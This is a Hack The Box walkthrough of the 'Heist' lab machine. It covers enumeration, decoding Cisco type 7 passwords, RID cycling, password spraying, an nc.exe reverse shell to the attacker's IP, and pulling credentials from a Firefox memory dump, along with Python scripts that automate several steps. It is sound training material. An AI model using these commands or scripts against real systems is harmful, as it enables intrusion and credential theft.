# HTB - Heist

## Enumeration

***

**Scope**

> IP Address: 10.10.10.149

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p1-10000 $ip -Pn -n --disable-arp-ping -vv --min-rate 10000

PORT     STATE SERVICE      REASON
80/tcp   open  http         syn-ack
135/tcp  open  msrpc        syn-ack
445/tcp  open  microsoft-ds syn-ack
5985/tcp open  wsman        syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p80,135,445,5985 $ip -sCV -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-06T23:55:49
|_  start_date: N/A
```

```
* Open ports: 80 - 135 - 445 - 5985
* UDP Open ports: None
* Services: HTTP - RPC - SMB - WinRM
* Versions: IIS httpd 10.0
```

**SMB**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ smbclient -N -L //$ip                       
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u ''  -p '' --shares  
SMB     10.10.10.149    445    SUPPORTDESK  [-] SupportDesk\: STATUS_ACCESS_DENIED
```

Anonymous (null-session) SMB enumeration is denied, so I switched to RPC, but the null session is rejected there as well.

**RPC**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED
```

**HTTP**

The web page at `http://10.10.10.149/login.php`:

<figure><img src="/files/hZexjn9r6V86Z0Iqg6qc" alt=""><figcaption></figcaption></figure>

I tried default credentials, but the `Login` button didn't send any request to the backend server. `Login as guest`, however, caught my attention, so I clicked it.

<figure><img src="/files/VlT6G94Nl90P90dcjStZ" alt=""><figcaption></figcaption></figure>

It took me to `http://10.10.10.149/issues.php` as shown above.

From this page I could extract some useful information:

```
usernames: Hazard, Support Admin
Attachment: http://10.10.10.149/attachments/config.txt
```

`http://10.10.10.149/attachments/config.txt`

<figure><img src="/files/VsjREGmwzS15clTPO7wC" alt=""><figcaption></figcaption></figure>

If you have configured a Cisco router before, you will recognise this syntax and these commands. We can extract additional information:

```
usernames: rout3r, admin

password strings (the first two are type 7, the last is a type 5 hash):
0242114B0E143F015F5D1E161713
02375012182C1A1D751618034F36415408
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
```

My plan was to build a username list, recover the passwords (cracking or decoding as appropriate), and spray them against SMB.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat users.list
Hazard
"support Admin"
rout3r
admin
```

First I had to identify the hash type in order to crack it:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ hashid -m '$1$pdQG$o8nrSzsGXeaduXrjlvKc91'                              

[+] MD5 Crypt [Hashcat Mode: 500]
[+] Cisco-IOS(MD5) [Hashcat Mode: 500]
[+] FreeBSD MD5 [Hashcat Mode: 500]
```

Since this hash came from a router configuration, it is Cisco IOS type 5 (`enable secret 5`). All three candidates are the same MD5-crypt scheme anyway, so hashcat mode 500 is correct either way:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ hashcat -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' /usr/share/wordlists/rockyou.txt

<snip>
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent              
Session..........: hashcat
Status...........: Cracked
```

The lines `username <user> password 7 <string>` show that the other two values use type 7. Type 7 is not a hash but a reversible obfuscation (`service password-encryption`) with a fixed, publicly known key, so these values are decoded rather than cracked.

I used this tool to decode them:

{% embed url="<https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html>" %}

<figure><img src="/files/0i2SZVnJlZuJXwsvQvVy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/90cnEIeyerOFGi3QdeR7" alt=""><figcaption></figcaption></figure>
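
The web tool above does the reversal for you. As an added example (my own code, not part of the original write-up or of any Cisco tooling), here is the same type 7 reversal in Python, together with a small parser that pulls the credential lines out of a running-config and tells the decodable `password 7` values apart from the `secret 5` MD5-crypt hash that still has to be cracked. The XOR key is the well-known constant Cisco IOS uses; `SAMPLE_CONFIG` is a constructed sample built from the values quoted from `config.txt` above, not the attachment itself.

```python
import re

# Cisco IOS "password 7" values are reversible obfuscation, not hashes: every
# byte of the plaintext is XORed with this fixed, publicly known key, starting
# at the offset given by the first two decimal digits of the stored value.
XLAT_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a 'password 7' string such as 0242114B0E143F015F5D1E161713."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("type 7 value must be an even number of characters (>= 4)")
    seed = int(encoded[:2], 10)        # two decimal digits: starting key offset
    if seed >= len(XLAT_KEY):
        raise ValueError("seed out of range")
    body = bytes.fromhex(encoded[2:])  # the rest is hex, one byte per plaintext char
    plain = bytes(b ^ XLAT_KEY[(seed + i) % len(XLAT_KEY)] for i, b in enumerate(body))
    return plain.decode("ascii")


def encode_type7(plain: str, seed: int = 2) -> str:
    """Forward direction, included only to show that the scheme is a plain round trip."""
    if not 0 <= seed <= 15:
        raise ValueError("IOS itself only uses seeds 0-15")
    data = plain.encode("ascii")
    body = bytes(b ^ XLAT_KEY[(seed + i) % len(XLAT_KEY)] for i, b in enumerate(data))
    return f"{seed:02d}{body.hex().upper()}"


# Credential lines worth pulling out of a running-config.  'secret 5' is
# MD5-crypt and has to be cracked (hashcat -m 500); 'password 7' is decodable.
TYPE7_RE = re.compile(
    r"^\s*username\s+(\S+)(?:\s+privilege\s+\d+)?\s+password\s+7\s+([0-9A-Fa-f]+)", re.M)
SECRET5_RE = re.compile(
    r"^\s*(?:enable|username\s+(\S+)(?:\s+privilege\s+\d+)?)\s+secret\s+5\s+(\$1\$\S+)", re.M)


def extract_credentials(config: str) -> list:
    """Return (account, kind, value) tuples; kind is 'plaintext' or 'md5crypt'."""
    found = []
    for user, enc in TYPE7_RE.findall(config):
        found.append((user, "plaintext", decode_type7(enc)))
    for user, hashval in SECRET5_RE.findall(config):
        found.append((user or "enable", "md5crypt", hashval))
    return found


# Constructed sample modelled on the values quoted from config.txt above;
# it is not the attachment itself.
SAMPLE_CONFIG = """\
version 12.2
hostname Router
!
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
"""

if __name__ == "__main__":
    for account, kind, value in extract_credentials(SAMPLE_CONFIG):
        print(f"{account:8} {kind:10} {value}")
```

Running it prints the two decoded type 7 passwords next to the `enable` hash, which is the one value that still has to go through hashcat.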

Now I'll create a password list and spray it against SMB:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat passwords.list      
stealth1agent
Q4)sJu\Y8qz*A3?d
$uperP@ssword
```

<figure><img src="/files/KnMumCHtYsP3hC5bKWUq" alt=""><figcaption></figcaption></figure>

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u users.list -p passwords.list --continue-on-success

SMB  10.10.10.149    445    SUPPORTDESK  [+] SupportDesk\Hazard:stealth1agent 
<snip>
```

I enumerated SMB with the credentials I had found, but there was nothing interesting: Hazard only has read access to `IPC$`, which holds no files.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u Hazard -p 'stealth1agent' --shares               

SMB  10.10.10.149   445     SUPPORTDESK      ADMIN$         Remote Admin
SMB  10.10.10.149   445     SUPPORTDESK       C$            Default share
SMB  10.10.10.149   445     SUPPORTDESK      IPC$    READ   Remote IPC

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ smbclient -U Hazard \\\\$ip\\IPC$       

smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
```

The only option left was to enumerate RPC with Hazard's credentials. I tried several commands, but only these two worked:

```bash
rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
```

So the domain SID, or here the local machine SID, is `S-1-5-21-4254423774-1266059056-3197185112`, and an account's SID is that value with its RID appended. I wanted to enumerate users, but `enumdomusers` failed; `lookupnames` and `lookupsids` can be used for that purpose instead.

* A user SID consists of two parts:

  * the SID of the domain (or machine)
  * the RID of the account

  I knew from previous experience that RID `500` is the built-in Administrator (`501` is Guest) and that regular accounts get RIDs from `1000` upwards, so I generated `{500..510}` for the built-in accounts and `{1000..1100}` for regular users.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for rid in {500..510};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids.txt;done

for rid in {1000..1100};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids1.txt;done
```

Loop over the two lists, collect the `lookupsids` output in `results.txt`, then drop the unresolved SIDs (rpcclient prints those as `*unknown*`). The same RID cycling is automated by `impacket-lookupsid` and `crackmapexec smb --rid-brute`, which use one session for the whole range instead of reconnecting for every SID.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for sid in $(cat sids.txt);do rpcclient -U "Hazard%stealth1agent" $ip -c "lookupsids $sid" >> results.txt;done

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for sid in $(cat sids1.txt);do rpcclient -U "Hazard%stealth1agent" $ip -c "lookupsids $sid" >> results.txt;done

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat results.txt | grep -v unknown                         
S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\Administrator (1)
S-1-5-21-4254423774-1266059056-3197185112-501 SUPPORTDESK\Guest (1)
S-1-5-21-4254423774-1266059056-3197185112-503 SUPPORTDESK\DefaultAccount (1)
S-1-5-21-4254423774-1266059056-3197185112-504 SUPPORTDESK\WDAGUtilityAccount (1)
S-1-5-21-4254423774-1266059056-3197185112-513 SUPPORTDESK\None (2)
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)
```
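
As an added example (my own helper, not part of the original write-up), the RID-cycling step above as a Python script: it builds the candidate SIDs, batches them into a single `rpcclient -c "lookupsids ..."` call per batch instead of one connection per RID, and parses the output, keeping the numeric SID_NAME_USE code so that users (`1`) can be separated from groups (`2`) and unresolved RIDs (`8`). `run_lookupsids` needs a live target and is not exercised offline; the parser runs on `SAMPLE_OUTPUT`, a constructed sample in rpcclient's output format modelled on the results above.

```python
import re
import subprocess

# SID_NAME_USE codes that rpcclient prints in parentheses after each name.
SID_NAME_USE = {
    1: "user", 2: "group", 3: "domain", 4: "alias", 5: "well-known group",
    6: "deleted", 7: "invalid", 8: "unknown", 9: "computer",
}

# One lookupsids line: "<sid> <domain>\<name> (<type>)".  Unresolved RIDs come
# back as "*unknown*\*unknown* (8)"; names (not domains) may contain spaces.
LINE_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)\s+(\S+)\\(.+?)\s+\((\d+)\)\s*$")


def candidate_sids(base_sid: str, ranges=((500, 510), (1000, 1100))) -> list:
    """SIDs to try: built-in accounts from 500, accounts created later from 1000."""
    return [f"{base_sid}-{rid}" for lo, hi in ranges for rid in range(lo, hi + 1)]


def lookupsids_command(target: str, user: str, password: str, sids: list) -> list:
    """rpcclient's lookupsids takes several SIDs at once, so one session resolves a batch."""
    return ["rpcclient", "-U", f"{user}%{password}", target,
            "-c", "lookupsids " + " ".join(sids)]


def run_lookupsids(target: str, user: str, password: str, sids: list, batch: int = 50) -> str:
    """Run rpcclient in batches against a live target and return its combined stdout."""
    out = []
    for i in range(0, len(sids), batch):
        cmd = lookupsids_command(target, user, password, sids[i:i + batch])
        out.append(subprocess.run(cmd, capture_output=True, text=True, check=False).stdout)
    return "".join(out)


def parse_lookupsids(output: str) -> list:
    """Turn rpcclient output into records with a readable account type."""
    records = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base, rid, domain, name, code = m.groups()
        records.append({"sid": f"{base}-{rid}", "rid": int(rid), "domain": domain,
                        "name": name, "type": SID_NAME_USE.get(int(code), "unknown")})
    return records


def account_names(records: list) -> list:
    """User accounts only (type code 1), ready to be written to a spray list."""
    return [r["name"] for r in records if r["type"] == "user"]


# Constructed sample in rpcclient's format, including the unresolved RIDs that
# the write-up filtered out with `grep -v unknown`.
SAMPLE_OUTPUT = """\
S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\\Administrator (1)
S-1-5-21-4254423774-1266059056-3197185112-501 SUPPORTDESK\\Guest (1)
S-1-5-21-4254423774-1266059056-3197185112-502 *unknown*\\*unknown* (8)
S-1-5-21-4254423774-1266059056-3197185112-513 SUPPORTDESK\\None (2)
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\\Hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1010 *unknown*\\*unknown* (8)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\\Chase (1)
"""

if __name__ == "__main__":
    records = parse_lookupsids(SAMPLE_OUTPUT)
    for r in records:
        print(f"{r['rid']:>5}  {r['type']:<8} {r['domain']}\\{r['name']}")
    print("spray list:", account_names(records))
```

Against a real target you would call `run_lookupsids(ip, "Hazard", "stealth1agent", candidate_sids(base_sid))` and feed the result to `parse_lookupsids`; the type code matters because RID 513 (`None` here) is a group and would only add noise to a password spray.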

## Initial Access

***

I created a wordlist of the newly discovered users and sprayed SMB again:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat users.lst                    
Hazard
support
Chase
Jason
```

We got a hit :)

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u users.lst -p passwords.list 

<snip>
SMB   10.10.10.149    445    SUPPORTDESK   [+] SupportDesk\Chase:Q4)sJu\Y8qxxxxxx
```

Since port 5985 is open, I check with `crackmapexec` whether `Chase` can log in over WinRM:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec winrm $ip -u Chase -p 'Q4)sJu\Y8qxxxxxxx'

WINRM 10.10.10.149  5985 SUPPORTDESK  [+] SupportDesk\Chase:Q4)sJu\Y8qxxxxxxx (Pwn3d!)
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ evil-winrm -i $ip -u Chase -p 'Q4)sJu\Y8qxxxxxxx'

*Evil-WinRM* PS C:\Users\Chase\Documents>

*Evil-WinRM* PS C:\Users\Chase> type Desktop\user.txt
7ec14ed02a46043fc7c55xxxxxxxxxxxxxxxx
```

> User Flag: 7ec14ed02a46043fc7cxxxxxxxxxxxxx

***

## Privilege Escalation

`evil-winrm` is slow, so I upload `nc` and get a shell through it instead:

```bash
*Evil-WinRM* PS C:\Tools> upload nc.exe
*Evil-WinRM* PS C:\Tools> .\nc.exe 10.10.16.25 443 -e PowerShell
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.149] 49716
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Tools>
```

I didn't find much of interest as `Chase`, so I ran `winPEAS.exe`, which flagged these files as readable:

```
C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\cert9.db
```

Unfortunately, extracting the secrets from these files revealed nothing useful (`key4.db` only holds the NSS master key; the saved logins it would decrypt live in `logins.json`).

Then a hint from the community made me change approach and dump the Firefox process memory. Here is how I did it.

I uploaded `procdump.exe` from the Sysinternals suite, listed the `firefox` processes, and dumped one of them:

```bash
PS C:\Tools> curl 10.10.16.25/procdump.exe -o .\p.exe

PS C:\Tools> Get-Process -name firefox

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    347      19    10236      35660       0.11   4136   1 firefox
   1089      72   151396     228756       4.92   6036   1 firefox
    401      33    32148      90740       0.59   6280   1 firefox
    378      28    22600      59420       0.38   6484   1 firefox
    355      25    16464      38936       0.13   6764   1 firefox  
```

```bash
PS C:\Tools> .\p.exe -accepteula -ma 6764

[08:04:29] Dump 1 initiated: C:\Tools\firefox.exe_240707_080429.dmp
[08:04:29] Dump 1 writing: Estimated dump file size is 298 MB.
```

Start an SMB server on the attack host and copy the dump over:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ impacket-smbserver -smb2support share .

PS C:\Tools> copy firefox.exe_240707_080429.dmp \\10.10.16.25\share
```

The `.dmp` file is binary, so pipe it through `strings` before `grep` (or use `grep -a`). By default `strings` only extracts ASCII; Windows processes also keep many strings as UTF-16LE, which need `strings -el`:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ strings firefox.exe_240707_080429.dmp | grep "administrator\|password"

<snip>
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8xxxxx&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]xxxxx&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8xxxxx&login=
<snip>
```
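
As an added example (my own code, not from the original write-up), a small Python scanner that does what the `strings | grep` above does but also covers what plain `strings` misses: it extracts printable runs in both ASCII and UTF-16LE, finds URL query strings inside them, and pulls out user/password parameter pairs. `SAMPLE_DUMP` is a constructed stand-in for the minidump with made-up credentials, not the real `firefox.exe_*.dmp`, and the parameter names in `USER_KEYS`/`SECRET_KEYS` are assumptions to adjust for a different application.

```python
import re

# Minimum run length, matching the default of `strings`.
MIN_LEN = 8

# Printable ASCII runs, and the same characters as UTF-16LE (each followed by a
# NUL), which `strings` only reports with -el.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# Assumed query-parameter names, in order of preference.
USER_KEYS = ("login_username", "username", "user", "email", "login")
SECRET_KEYS = ("login_password", "password", "passwd", "pwd")


def iter_strings(blob: bytes):
    """Yield (offset, encoding, text) for every printable run, ASCII and UTF-16LE."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16-le")


def query_params(text: str) -> dict:
    """Raw key/value pairs from the query string of the first URL-like token in a run."""
    params = {}
    for token in text.split():
        if "?" not in token:
            continue
        for pair in token.split("?", 1)[1].split("&"):
            key, _, value = pair.partition("=")
            if key:
                params[key] = value   # kept raw: no %-decoding, no '+' to space
        if params:
            break
    return params


def find_query_credentials(blob: bytes) -> list:
    """Unique (user, password) pairs found in URL query strings anywhere in the dump."""
    hits = []
    for _offset, _encoding, text in iter_strings(blob):
        params = query_params(text)
        secret = next((params[k] for k in SECRET_KEYS if params.get(k)), None)
        if secret is None:
            continue
        user = next((params[k] for k in USER_KEYS if params.get(k)), "")
        if (user, secret) not in hits:
            hits.append((user, secret))
    return hits


# Constructed stand-in for a process dump: an ASCII crash-reporter restart
# argument (the shape seen in the real dump), a duplicate fragment, a UTF-16LE
# URL that plain `strings` would not show, and some unrelated bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php"
      b"?login_username=helpdesk@example.test&login_password=Tr0ub4dor!}/]x&login=\x00"
    + b"\x01\x02garbage\x00"
    + b"RG_1=localhost/login.php?login_username=helpdesk@example.test"
      b"&login_password=Tr0ub4dor!}/]x&login=\x00"
    + "http://intranet.local/auth?user=jdoe&passwd=Wint3r!&submit=1".encode("utf-16-le")
    + b"\x00" * 8
    + b"PATH=C:\\Windows\\system32\x00"
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for user, secret in find_query_credentials(data):
        print(f"{user}:{secret}")
```

Run it with the dump path as its only argument to scan a real file; with no argument it scans the constructed sample. Values are deliberately left undecoded because memory artifacts are often the raw bytes the application sent, and `%`-decoding a password that was never encoded would corrupt it.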

The match is in `MOZ_CRASHREPORTER_RESTART_ARG_1`, which Firefox sets to its own launch arguments so that the crash reporter can restart it; in other words the login URL, password included, was passed to Firefox on its command line. Credentials found:

```
admin@support.htb:4dD!5}x/re8]xxxxxx
```

I will try to test these creds with `crackmapexec`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u administrator -p '4dD!5}x/re8]xxxxxx'

SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
```

And we have the administrator account :)

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ impacket-psexec supportdesk/administrator@$ip                                  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:

C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt  
906f0e1ac412590d0bdc50xxxxxxxxxx
```

> Root Flag: 906f0e1ac412590d0xxxxxxxxxxx

